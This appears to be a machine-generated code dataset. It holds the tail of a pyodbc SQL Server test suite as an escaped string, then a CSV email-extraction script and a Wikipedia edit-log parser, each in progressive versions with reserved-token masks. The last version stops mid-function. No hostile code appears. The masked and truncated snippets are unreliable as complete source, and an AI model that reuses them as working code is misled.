cursor.execute(\"create table t1(a int, b char(3))\")\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute(\"select * from t1\").fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n # A project was failing to create temporary tables via select into.\n cursor.execute(\"create table t1(s char(7))\")\n cursor.execute(\"insert into t1 values(?)\", \"testing\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert v == \"testing\"\n\n cursor.execute(\"select s into t2 from t1\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert v == \"testing\"\n\n\ndef test_executemany(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(a int, b varchar(10))\")\n\n params = [(i, str(i)) for i in range(1, 6)]\n\n cursor.executemany(\"insert into t1(a, 
b) values (?,?)\", params)\n\n count = cursor.execute(\"select count(*) from t1\").fetchone()[0]\n assert count == len(params)\n\n cursor.execute(\"select a, b from t1 order by a\")\n rows = cursor.fetchall()\n assert count == len(rows)\n\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_one(cursor: pyodbc.Cursor):\n \"Pass executemany a single sequence\"\n cursor.execute(\"create table t1(a int, b varchar(10))\")\n\n params = [(1, \"test\")]\n\n cursor.executemany(\"insert into t1(a, b) values (?,?)\", params)\n\n count = cursor.execute(\"select count(*) from t1\").fetchone()[0]\n assert count == len(params)\n\n cursor.execute(\"select a, b from t1 order by a\")\n rows = cursor.fetchall()\n assert count == len(rows)\n\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_dae_0(cursor: pyodbc.Cursor):\n \"\"\"\n DAE for 0-length value\n \"\"\"\n cursor.execute(\"create table t1(a nvarchar(max))\")\n\n cursor.fast_executemany = True\n cursor.executemany(\"insert into t1(a) values(?)\", [['']])\n\n assert cursor.execute(\"select a from t1\").fetchone()[0] == ''\n\n cursor.fast_executemany = False\n\n\ndef test_executemany_failure(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure that an exception is raised if one query in an executemany fails.\n \"\"\"\n cursor.execute(\"create table t1(a int, b varchar(10))\")\n\n params = [(1, 'good'),\n ('error', 'not an int'),\n (3, 'good')]\n\n with pytest.raises(pyodbc.Error):\n cursor.executemany(\"insert into t1(a, b) value (?, ?)\", params)\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(a int, b int, c int, d int)\")\n cursor.execute(\"insert into t1 values(1,2,3,4)\")\n\n row = cursor.execute(\"select * from t1\").fetchone()\n\n result = row[:]\n assert result is row\n\n result = row[:-1]\n assert result == (1, 2, 3)\n\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(a int, b int, c int, d varchar(50))\")\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n\n row = cursor.execute(\"select * from t1\").fetchone()\n\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n\n result = str(row[:-1])\n assert result == \"(1, 2, 3)\"\n\n result = str(row[:1])\n assert result == \"(1,)\"\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n\n cursor.execute(\"create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))\")\n cursor.execute(\"insert into t1(c2, c3) values (?,?)\", v2, v3)\n\n row = cursor.execute(\"select c2, c3, c2 + c3 as both from t1\").fetchone()\n\n assert row.both == v2 + v3\n\n\ndef test_view_select(cursor: pyodbc.Cursor):\n # Reported in forum: Can't select from a view? 
I think I do this a lot, but another test\n # never hurts.\n\n # Create a table (t1) with 3 rows and a view (t2) into it.\n cursor.execute(\"create table t1(c1 int identity(1, 1), c2 varchar(50))\")\n for i in range(3):\n cursor.execute(\"insert into t1(c2) values (?)\", f\"string{i}\")\n cursor.execute(\"create view t2 as select * from t1\")\n\n # Select from the view\n cursor.execute(\"select * from t2\")\n rows = cursor.fetchall()\n assert rows is not None\n assert len(rows) == 3\n\n\ndef test_autocommit():\n cnxn = connect()\n assert cnxn.autocommit is False\n cnxn = None\n\n cnxn = connect(autocommit=True)\n assert cnxn.autocommit is True\n cnxn.autocommit = False\n assert cnxn.autocommit is False\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute(\"drop procedure pyodbctest\")\n cursor.commit()\n except:\n pass\n\n cursor.execute(\"create table t1(s varchar(10))\")\n cursor.execute(\"insert into t1 values(?)\", \"testing\")\n\n cursor.execute(\"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\")\n\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n # Insert 1, 2, and 3. Fetch 1, skip 2, fetch 3.\n\n cursor.execute(\"create table t1(id int)\")\n for i in range(1, 5):\n cursor.execute(\"insert into t1 values(?)\", i)\n cursor.execute(\"select id from t1 order by id\")\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0 # defaults to zero (off)\n\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n # Only lists and tuples are allowed.\n cursor.execute(\"create table t1 (word varchar (100))\")\n\n words = {'a', 'b', 'c'}\n\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute(\"insert into t1 (word) values (?)\", words)\n\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany(\"insert into t1 (word) values (?)\", words)\n\n\ndef test_row_execute(cursor: pyodbc.Cursor):\n \"Ensure we can use a Row object as a parameter to execute\"\n cursor.execute(\"create table t1(n int, s varchar(10))\")\n cursor.execute(\"insert into t1 values (1, 'a')\")\n row = cursor.execute(\"select n, s from t1\").fetchone()\n assert row\n\n cursor.execute(\"create table t2(n int, s varchar(10))\")\n cursor.execute(\"insert into t2 values (?, ?)\", row)\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"Ensure we can use a Row object as a parameter to executemany\"\n cursor.execute(\"create table t1(n int, s varchar(10))\")\n\n for i in range(3):\n cursor.execute(\"insert into t1 values (?, ?)\", i, chr(ord('a') + i))\n\n rows = cursor.execute(\"select n, s from t1\").fetchall()\n assert len(rows) != 0\n\n cursor.execute(\"create table t2(n int, s varchar(10))\")\n cursor.executemany(\"insert into t2 values (?, ?)\", rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"Ensure cursor.description is correct\"\n\n cursor.execute(\"create table t1(n int, s varchar(8), d decimal(5,2))\")\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute(\"select * from t1\")\n\n # (I'm not sure the precision of an int is constant across different versions, bits, so I'm\n # hand checking the items I do know.\n\n # int\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0 # scale\n assert t[6] is True # nullable\n\n 
# varchar(8)\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8 # precision\n assert t[5] == 0 # scale\n assert t[6] is True # nullable\n\n # decimal(5, 2)\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5 # precision\n assert t[5] == 2 # scale\n assert t[6] is True # nullable\n\n\ndef test_cursor_messages_with_print(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure the Cursor.messages attribute is handled correctly with a simple PRINT statement.\n \"\"\"\n assert not cursor.messages\n\n # SQL Server PRINT statements are never more than 8000 characters\n # https://docs.microsoft.com/en-us/sql/t-sql/language-elements/print-transact-sql#remarks\n for msg in ('hello world', 'ABCDEFGHIJ' * 800):\n cursor.execute(f\"PRINT '{msg}'\")\n messages = cursor.messages\n assert isinstance(messages, list)\n assert len(messages) == 1\n assert isinstance(messages[0], tuple)\n assert len(messages[0]) == 2\n assert isinstance(messages[0][0], str)\n assert isinstance(messages[0][1], str)\n assert '[01000] (0)' == messages[0][0]\n assert messages[0][1].endswith(msg)\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\")\n\n # The messages will look like:\n #\n # [Microsoft][ODBC Driver 18 for SQL Server][SQL Server]Message 1a\n\n # result set 1: messages, rows\n cursor.execute(\"exec test_cursor_messages\")\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [\n re.search(r'Message \\d[ab]$', m[1]).group(0)\n for m in cursor.messages\n ]\n assert msgs == ['Message 1a', 'Message 1b']\n\n # result set 2: rows, no messages\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n\n # result set 3: messages, no rows\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [\n re.search(r'Message \\d[ab]$', m[1]).group(0)\n for m in cursor.messages\n ]\n assert msgs == ['Message 2a', 'Message 2b']\n\n # result set 4: no rows, no messages\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"Ensure None can be used for params other than the first\"\n # Some driver/db versions would fail if NULL was not the first parameter because\n # SQLDescribeParam (only used with NULL) could not be used after the first call to\n # SQLBindParameter. 
This means None always worked for the first column, but did not work\n # for later columns.\n #\n # If SQLDescribeParam doesn't work, pyodbc would use VARCHAR which almost always worked.\n # However, binary/varbinary won't allow an implicit conversion.\n\n cursor.execute(\"create table t1(n int, blob varbinary(max))\")\n cursor.execute(\"insert into t1 values (1, newid())\")\n row = cursor.execute(\"select * from t1\").fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n\n sql = \"update t1 set n=?, blob=?\"\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n # cnxn.getinfo(pyodbc.SQL_DESCRIBE_PARAMETER) returns False for FreeTDS, so pyodbc\n # can't call SQLDescribeParam to get the correct parameter type. This can lead to\n # errors being returned from SQL Server when sp_prepexec is called, e.g., \"Implicit\n # conversion from data type varchar to varbinary(max) is not allowed.\"\n #\n # So at least verify that the user can manually specify the parameter type\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute(\"select * from t1\").fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n def convert1(value):\n # The value is the raw bytes (as a bytes object) read from the\n # database. We'll simply add an X at the beginning at the end.\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n # Same as above, but add a Y at the beginning at the end.\n return 'Y' + value.decode('latin1') + 'Y'\n\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"create table t1(n int, v varchar(10))\")\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n\n # Clear all conversions and try again. 
There should be no Xs this time.\n cnxn.clear_output_converters()\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n # Same but clear using remove_output_converter.\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n # Clear via add_output_converter, passing None for the converter function.\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n # retrieve and temporarily replace converter (get_output_converter)\n #\n # case_1: converter already registered\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n #\n # case_2: no converter already registered\n cnxn.clear_output_converters()\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n\ndef test_too_large(cursor: pyodbc.Cursor):\n \"\"\"Ensure error raised if insert fails due to truncation\"\"\"\n value = 'x' * 1000\n cursor.execute(\"create table t1(s varchar(800))\")\n\n with pytest.raises(pyodbc.Error):\n cursor.execute(\"insert into t1 values (?)\", value)\n\n\ndef test_row_equal(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(n int, s varchar(20))\")\n cursor.execute(\"insert into t1 values (1, 'test')\")\n row1 = cursor.execute(\"select n, s from t1\").fetchone()\n row2 = cursor.execute(\"select n, s from t1\").fetchone()\n assert row1 == row2\n\n\ndef test_row_gtlt(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(n int, s varchar(20))\")\n cursor.execute(\"insert into t1 values (1, 'test1')\")\n cursor.execute(\"insert into t1 values (1, 'test2')\")\n rows = cursor.execute(\"select n, s from t1 order by s\").fetchall()\n assert rows[0] < rows[1]\n assert rows[0] <= rows[1]\n assert rows[1] > rows[0]\n assert rows[1] >= rows[0]\n assert rows[0] != rows[1]\n\n rows = list(rows)\n rows.sort() # uses <\n\n\ndef test_context_manager_success():\n \"Ensure `with` commits if an exception is not raised\"\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"create table t1(n int)\")\n cnxn.commit()\n\n with cnxn:\n cursor.execute(\"insert into t1 values (1)\")\n\n rows = cursor.execute(\"select n from t1\").fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef 
test_context_manager_failure(cursor: pyodbc.Cursor):\n \"Ensure `with` rolls back if an exception is raised\"\n cnxn = connect()\n cursor = cnxn.cursor()\n\n # We'll insert a row and commit it. Then we'll insert another row followed by an\n # exception.\n\n cursor.execute(\"create table t1(n int)\")\n cursor.execute(\"insert into t1 values (1)\")\n cnxn.commit()\n\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute(\"insert into t1 values (2)\")\n cursor.execute(\"delete from bogus\")\n\n cursor.execute(\"select max(n) from t1\")\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n # From issue 129\n value = cursor.execute(\"select ?\", None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\ndef test_func_param(cursor: pyodbc.Cursor):\n try:\n cursor.execute(\"drop function func1\")\n except:\n pass\n cursor.execute(\"\"\"\n create function func1 (@testparam varchar(4))\n returns @rettest table (param varchar(4))\n as\n begin\n insert @rettest\n select @testparam\n return\n end\n \"\"\")\n cursor.commit()\n value = cursor.execute(\"select * from func1(?)\", 'test').fetchone()[0]\n assert value == 'test'\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n # When using aiohttp, `await cursor.primaryKeys('t1')` was raising the error\n #\n # Error: TypeError: argument 2 must be str, not None\n #\n # I'm not sure why, but PyArg_ParseTupleAndKeywords fails if you use \"|s\" for an\n # optional string keyword when calling indirectly.\n\n cursor.execute(\"create table t1(a int, b varchar(3), xΏz varchar(4))\")\n\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n\n # Now do the same, but specifically pass in None to one of the keywords. Old versions\n # were parsing arguments incorrectly and would raise an error. (This crops up when\n # calling indirectly like columns(*args, **kwargs) which aiodbc does.)\n\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n\n cursor.execute(f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\")\n\n col_count = len([col.column_name for col in cursor.columns(table_name)])\n assert col_count == 1\n\n cursor.execute(f\"drop table {table_name}\")\n\n\ndef test_cancel(cursor: pyodbc.Cursor):\n # I'm not sure how to reliably cause a hang to cancel, so for now we'll settle with\n # making sure SQLCancel is called correctly.\n cursor.execute(\"select 1\")\n cursor.cancel()\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n # https://github.com/mkleehammer/pyodbc/issues/423\n #\n # When sending a varchar parameter, pyodbc is supposed to set ColumnSize to the number\n # of characters. 
Ensure it works even with 4-byte characters.\n #\n # http://www.fileformat.info/info/unicode/char/1f31c/index.htm\n\n v = \"x \\U0001F31C z\"\n\n cursor.execute(\"create table t1(s nvarchar(100))\")\n cursor.execute(\"insert into t1 values (?)\", v)\n\n result = cursor.execute(\"select s from t1\").fetchone()[0]\n\n assert result == v\n\n\ndef test_emoticons_as_literal(cursor: pyodbc.Cursor):\n # similar to `test_emoticons_as_parameter`, above, except for Unicode literal\n #\n # http://www.fileformat.info/info/unicode/char/1f31c/index.htm\n\n # FreeTDS ODBC issue fixed in version 1.1.23\n # https://github.com/FreeTDS/freetds/issues/317\n\n v = \"x \\U0001F31C z\"\n\n cursor.execute(\"create table t1(s nvarchar(100))\")\n cursor.execute(f\"insert into t1 values (N'{v}')\")\n\n result = cursor.execute(\"select s from t1\").fetchone()[0]\n\n assert result == v\n\n\ndef _test_tvp(cursor: pyodbc.Cursor, diff_schema):\n # Test table value parameters (TVP). I like the explanation here:\n #\n # https://www.mssqltips.com/sqlservertip/1483/using-table-valued-parameters-tvp-in-sql-server/\n #\n # \"At a high level the TVP allows you to populate a table declared as a T-SQL variable,\n # then pass that table as a parameter to a stored procedure or function.\"\n #\n # \"The TVP must be declared READONLY. You cannot perform any DML (i.e. INSERT, UPDATE,\n # DELETE) against the TVP; you can only reference it in a SELECT statement.\"\n #\n # In this test we'll create a table, pass it to a stored procedure, and have the stored\n # procedure simply return the rows from the TVP.\n #\n # Apparently the way pyodbc knows something is a TVP is because it is in a sequence. I'm\n # not sure I like that as it is very generic and specific to SQL Server. It would be wiser\n # to define a wrapper pyodbc.TVP or pyodbc.Table object, similar to the DB APIs `Binary`\n # object.\n\n pyodbc.native_uuid = True\n # This is the default, but we'll reset it in case a previous test fails to.\n\n procname = 'SelectTVP'\n typename = 'TestTVP'\n\n if diff_schema:\n schemaname = 'myschema'\n procname = schemaname + '.' + procname\n typenameonly = typename\n typename = schemaname + '.' 
+ typename\n\n # (Don't use \"if exists\" since older SQL Servers don't support it.)\n try:\n cursor.execute(\"drop procedure \" + procname)\n except:\n pass\n try:\n cursor.execute(\"drop type \" + typename)\n except:\n pass\n if diff_schema:\n try:\n cursor.execute(\"drop schema \" + schemaname)\n except:\n pass\n cursor.commit()\n\n if diff_schema:\n cursor.execute(\"CREATE SCHEMA myschema\")\n cursor.commit()\n\n cursor.execute(\n f\"\"\"\n CREATE TYPE {typename} AS TABLE(\n c01 VARCHAR(255),\n c02 VARCHAR(MAX),\n c03 VARBINARY(255),\n c04 VARBINARY(MAX),\n c05 BIT,\n c06 DATE,\n c07 TIME,\n c08 DATETIME2(5),\n c09 BIGINT,\n c10 FLOAT,\n c11 NUMERIC(38, 24),\n c12 UNIQUEIDENTIFIER)\n \"\"\")\n cursor.commit()\n cursor.execute(\n f\"\"\"\n CREATE PROCEDURE {procname} @TVP {typename} READONLY\n AS SELECT * FROM @TVP;\n \"\"\")\n cursor.commit()\n\n # The values aren't exactly VERY_LONG_LEN but close enough and *significantly* faster than\n # the loop we had before.\n VERY_LONG_LEN = 2000000\n long_string = ''.join(chr(i) for i in range(32, 127)) # printable characters\n long_bytearray = bytes(list(range(255)))\n very_long_string = long_string * (VERY_LONG_LEN // len(long_string))\n very_long_bytearray = long_bytearray * (VERY_LONG_LEN // len(long_bytearray))\n\n params = [\n # Three rows with all of the types in the table defined above.\n (\n 'abc', 'abc',\n bytes([0xD1, 0xCE, 0xFA, 0xCE]),\n bytes([0x0F, 0xF1, 0xCE, 0xCA, 0xFE]), True,\n date(1997, 8, 29), time(9, 13, 39),\n datetime(2018, 11, 13, 13, 33, 26, 298420),\n 1234567, 3.14, Decimal('31234567890123.141243449787580175325274'),\n uuid.UUID('4fe34a93-e574-04cc-200a-353f0d1770b1'),\n ),\n (\n '', '',\n bytes([0x00, 0x01, 0x02, 0x03, 0x04]),\n bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05]), False,\n date(1, 1, 1), time(0, 0, 0),\n datetime(1, 1, 1, 0, 0, 0, 0),\n -9223372036854775808, -1.79E+308, Decimal('0.000000000000000000000001'),\n uuid.UUID('33f7504c-2bac-1b83-01d1-7434a7ba6a17'),\n ),\n (\n long_string, very_long_string,\n bytes(long_bytearray), bytes(very_long_bytearray), True,\n date(9999, 12, 31), time(23, 59, 59),\n datetime(9999, 12, 31, 23, 59, 59, 999990),\n 9223372036854775807, 1.79E+308, Decimal('99999999999999.999999999999999999999999'),\n uuid.UUID('ffffffff-ffff-ffff-ffff-ffffffffffff'),\n )\n ]\n\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = [tuple(row) for row in cursor.execute(f\"exec {procname} ?\", p1).fetchall()]\n\n # The values make it very difficult to troubleshoot if something is wrong, so instead of\n # asserting they are the same, we'll walk them if there is a problem to identify which is\n # wrong.\n for row, param in zip(result_array, params):\n if row != param:\n for r, p in zip(row, param):\n assert r == p\n\n # Now test with zero rows.\n\n params = []\n p1 = [params]\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = cursor.execute(f\"exec {procname} ?\", p1).fetchall()\n assert result_array == params\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp(cursor: pyodbc.Cursor):\n _test_tvp(cursor, False)\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\ndef get_sqlserver_version(cursor: pyodbc.Cursor):\n\n \"\"\"\n Returns the major version: 8-->2000, 9-->2005, 10-->2008\n \"\"\"\n cursor.execute(\"exec master..xp_msver 'ProductVersion'\")\n row = 
cursor.fetchone()\n return int(row.Character_Value.split('.', 1)[0])\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. This simplifies the tests by letting us put None into\n an array of other lengths and pass them here, moving the special case check into one place.\n \"\"\"\n if length is None:\n return None\n\n # Put non-ASCII characters at the front so we don't end up chopping one in half in a\n # multi-byte encoding like UTF-8.\n\n v = 'á'\n\n remaining = max(0, length - len(v))\n if remaining:\n seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n\n if remaining <= len(seed):\n v += seed\n else:\n c = (remaining + len(seed) - 1 // len(seed))\n v += seed * c\n\n if encoding:\n v = v.encode(encoding)\n\n # We chop *after* encoding because if we are encoding then we want bytes.\n v = v[:length]\n\n return v\n",
"step-ids": [
47,
56,
70,
97,
108
]
}
|
[
47,
56,
70,
97,
108
] |
import csv
with open('faculty.csv') as facultycsv:
    emails = list()  # all email addresses
    for line in facultycsv:
        line = line.split(',')
        if line[0] == 'name':
            continue  # skip the header row
        try:
            email = line[3].rstrip()
            emails.append(email)
        except IndexError:
            # skip malformed rows without an email column
            continue
with open('emails.csv', 'w') as emailcsv:
writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)
for email in emails:
writer.writerow([email])
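# A minimal alternative sketch using the csv module for reading as well as
# writing, so quoted fields containing commas are parsed correctly. The column
# layout (header row starting with 'name', email in the fourth column) is
# taken from the script above and is an assumption about faculty.csv:
#
#   with open('faculty.csv') as facultycsv:
#       reader = csv.reader(facultycsv)
#       next(reader)  # skip the header row
#       emails = [row[3].strip() for row in reader if len(row) > 3]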
|
normal
|
{
"blob_id": "5af5c10c149c7b0e2a969be7895780d26a4294d0",
"index": 7326,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('faculty.csv') as facultycsv:\n emails = list()\n for line in facultycsv:\n line = line.split(',')\n if line[0] == 'name':\n continue\n try:\n email = line[3].rstrip()\n emails.append(email)\n except:\n continue\nwith open('emails.csv', 'w') as emailcsv:\n writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)\n for email in emails:\n writer.writerow([email])\n",
"step-3": "import csv\nwith open('faculty.csv') as facultycsv:\n emails = list()\n for line in facultycsv:\n line = line.split(',')\n if line[0] == 'name':\n continue\n try:\n email = line[3].rstrip()\n emails.append(email)\n except:\n continue\nwith open('emails.csv', 'w') as emailcsv:\n writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)\n for email in emails:\n writer.writerow([email])\n",
"step-4": "import csv\n\nwith open('faculty.csv') as facultycsv:\n emails = list() #all email addresses\n\n for line in facultycsv:\n line = line.split(',')\n if line[0] == 'name' : continue\n try:\n email = line[3].rstrip()\n emails.append(email)\n except:\n continue\n\nwith open('emails.csv', 'w') as emailcsv:\n writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)\n for email in emails:\n writer.writerow([email])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
format_string = '%s %s %s %s %s %s %s %s %s\n'
while True:
edit = [sys.stdin.readline() for i in range(14)]
if edit[13] == '':
break
revision = edit[0].split(' ')
article_id, rev_id, title, timestamp, username, user_id = ('a' +
revision[1], 'e' + revision[2], revision[3], revision[4],
revision[5], 'u' + revision[6].strip())
if user_id.startswith('uip'):
continue
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ''
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
outline = format_string % (article_id, rev_id, user_id, username,
title, timestamp, category, minor, word_count)
sys.stdout.write(outline)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
format_string = '%s %s %s %s %s %s %s %s %s\n'
while True:
edit = [sys.stdin.readline() for i in range(14)]
if edit[13] == '':
break
revision = edit[0].split(' ')
article_id, rev_id, title, timestamp, username, user_id = ('a' +
revision[1], 'e' + revision[2], revision[3], revision[4],
revision[5], 'u' + revision[6].strip())
if user_id.startswith('uip'):
continue
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ''
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
outline = format_string % (article_id, rev_id, user_id, username,
title, timestamp, category, minor, word_count)
sys.stdout.write(outline)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import sys
def main():
format_string = '%s %s %s %s %s %s %s %s %s\n'
while True:
edit = [sys.stdin.readline() for i in range(14)]
if edit[13] == '':
break
revision = edit[0].split(' ')
article_id, rev_id, title, timestamp, username, user_id = ('a' +
revision[1], 'e' + revision[2], revision[3], revision[4],
revision[5], 'u' + revision[6].strip())
if user_id.startswith('uip'):
continue
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ''
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
outline = format_string % (article_id, rev_id, user_id, username,
title, timestamp, category, minor, word_count)
sys.stdout.write(outline)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import sys
def main():
# String to format output
format_string = "%s %s %s %s %s %s %s %s %s\n"
while True:
# Read 14 lines at a time from stdin for wikipedia dataset
edit = [sys.stdin.readline() for i in range(14)]
# Break if we've reached the end of stdin
if edit[13] == "":
break
# Parse data from revision line
revision = edit[0].split(' ')
